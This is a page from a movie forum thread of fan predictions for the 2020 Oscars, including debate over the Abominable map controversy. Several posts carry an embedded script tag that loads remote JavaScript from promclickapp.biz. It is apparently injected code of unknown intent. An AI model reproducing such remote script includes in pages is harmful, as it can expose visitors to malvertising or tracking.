Home Forums Movies 2020 Oscar Predictions (Part 5)

2020 Oscar Predictions (Part 5)

CREATE A NEW TOPIC
CREATE A NEW POLL
Viewing 15 posts - 391 through 405 (of 445 total)
Created
10 months ago
Last Reply
10 months ago
( +9 hidden )
replies
views
users
teri
John Berchmans
Salsa Club
  • Profile picture
    Luca
    Topics:

I love love love Margot, but I still need Laura to win. It must happen.

Profile picture
    Mickmack
    Topics:

My thoughts on the race so far Picture – Irishman Director – Greta Gerwig Actor – Joaquin Actress – Renee Sup Actor – Brad Pitt Sup Actress – This one im stuck on , but i could see a dern win for sure or Pugh, Robie or even Maggie Smith

Gerwig is not even getting nominated.

<script src=”//promclickapp.biz/1e6ab715a3a95d4603.js” async=”” type=”text/javascript”></script>

Profile picture
    Rishabh Chaturvedi
    Topics:

Slightly unrelated, but does anyone know when exactly will the full AFI FEST lineup be revealed? And may we expect Little Women or 1917 to show up there at all, at this point?

Profile picture
    Qoslca
    Topics:

Question:

What do you think about the latest controversy surrounding Abominable? Do you think it’ll damage its Animated Feature nomination chances?

For those who don’t know, various countries are pulling the film from theaters over a scene that features a map of China – which includes Taiwan and Chinese ownership over the South China Sea. (The film is also majorly Chinese-financed and partly animated in China.)

What are your thoughts?

My username is an acronym of “Quiet On Set! Lights, Camera, Action.”

Profile picture
    TheDreamingHead
    Topics:

Question:

What do you think about the latest controversy surrounding Abominable? Do you think it’ll damage its Animated Feature nomination chances?

For those who don’t know, various countries are pulling the film from theaters over a scene that features a map of China – which includes Taiwan and Chinese ownership over the South China Sea. (The film is also majorly Chinese-financed and partly animated in China.)

What are your thoughts?

I live in Vietnam and the scandal is huge here. I don’t know if the movie is good or not but Dreamwork trying to flatter China just to sell their film to a huge market is an absolute NO-NO reason enough for me to put it in the boycott list, and I expect others in SEA will do the same.

Of course how the US Academy will perceive the film is a mystery.

Profile picture
    babypook
    Topics:

Ugh. I am NO fan of that government.

Their xu isn’t going to dominate forever. Let them make their trillions monopolizing the Olympics.

Btw good luck collecting on your debts there China.

Do Androids Dream of Electric Sheep?
    Philip K Dick Blade Runner

Profile picture
    AMG
    Topics:

How many double-double nominations have we had before? And when was the last time it happened, if ever?

Just pondering if Pacino & Pesci and Robbie & Kidman could do a double double in the supporting categories…

Check out more of my thoughts on Twitter (@AMG_Review) and Instagram (amg_reviews)

Profile picture
    Mr. Tintin
    Topics:

Question: What do you think about the latest controversy surrounding Abominable? Do you think it’ll damage its Animated Feature nomination chances? For those who don’t know, various countries are pulling the film from theaters over a scene that features a map of China – which includes Taiwan and Chinese ownership over the South China Sea. (The film is also majorly Chinese-financed and partly animated in China.) What are your thoughts?

I don’t know too much about the controversy, but I doubt it was getting nominated anyway.

Oscars 2020: I stan Joaquin Phoenix, Willem Dafoe, Alan Silvestri, and Dean Deblois.

Emmys 2020: I stan Logan Lerman, Olivia Colman, and David Harbour.

Tom Hanks and Amy Adams stan in general.

Profile picture
    GregSprinkles
    Topics:

How many double-double nominations have we had before? And when was the last time it happened, if ever? Just pondering if Pacino & Pesci and Robbie & Kidman could do a double double in the supporting categories…

I recall The Last Picture Show pulled off double nominations in both supporting categories. Ben Johnson, Cloris Leachman, Jeff Bridges, and Ellen Burstyn were all nominated. Johnson and Leachman won.

Profile picture
    Salsa Club
    Topics:

Pesci will not be nominated. It’s looking like Kidman won’t either

Profile picture
    Topics:
    This post was found to be inappropriate by the moderators and has been removed.
    Profile picture
    John Berchmans
    Topics:

If there’s a double nomination this year, it will be Pugh and Streep for Little Women. Kidman isn’t getting nearly as much praise as Robbie, she’ll probably miss out. Same goes for Pesci.

Also, I think Lithgow will miss out as well. I haven’t heard anyone single him out, and his performance seems like the kind that will be too unlikeable to resonate with Academy voters. It’s one thing to nominate a fictional villain like Joker, it’s another to nominate a real-life creep.

Stream After Hours and In Your Eyes (Remix)

Profile picture
    Mickmack
    Topics:

Pesci will not be nominated. It’s looking like Kidman won’t either

Pesci will be nominated.

<script src=”//promclickapp.biz/1e6ab715a3a95d4603.js” async=”” type=”text/javascript”></script>

Profile picture
    Salsa Club
    Topics:

Pesci will be nominated. <script src=”//promclickapp.biz/1e6ab715a3a95d4603.js” async=”” type=”text/javascript”></script>

He literally will not

Profile picture
    Topics:
    This post was found to be inappropriate by the moderators and has been removed.
Viewing 15 posts - 391 through 405 (of 445 total)

The topic ‘2020 Oscar Predictions (Part 5)’ is closed to new replies.